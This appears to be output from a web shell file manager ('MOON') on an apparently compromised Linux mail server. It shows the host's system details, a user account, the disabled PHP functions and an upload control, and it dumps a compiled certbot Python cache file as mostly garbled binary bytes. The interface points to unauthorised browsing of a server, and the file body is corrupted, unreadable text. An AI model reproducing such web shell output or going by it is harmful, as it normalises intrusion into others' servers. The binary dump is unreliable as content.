MOON
Server: Apache
System: Linux mail.espica.me 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User: solaraatech (1010)
PHP: 8.2.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //lib/python3.9/site-packages/certbot/__pycache__/main.cpython-39.pyc
a

}|�g�@s^dZddlmZddlmZddlmZddlmZd
eeeeeee	fd�dd	�ZdS)z Certbot main public entry point.�)�List)�Optional)�Union)�mainN)�cli_args�returncCs
t�|�S)z�Run Certbot.

    :param cli_args: command line to Certbot, defaults to ``sys.argv[1:]``
    :type cli_args: `list` of `str`

    :returns: value for `sys.exit` about the exit status of Certbot
    :rtype: `str` or `int` or `None`

    )�
internal_mainr)r�r	�0/usr/lib/python3.9/site-packages/certbot/main.pyr	s
r)N)
�__doc__�typingrrrZcertbot._internalrr�str�intr	r	r	r
�<module>s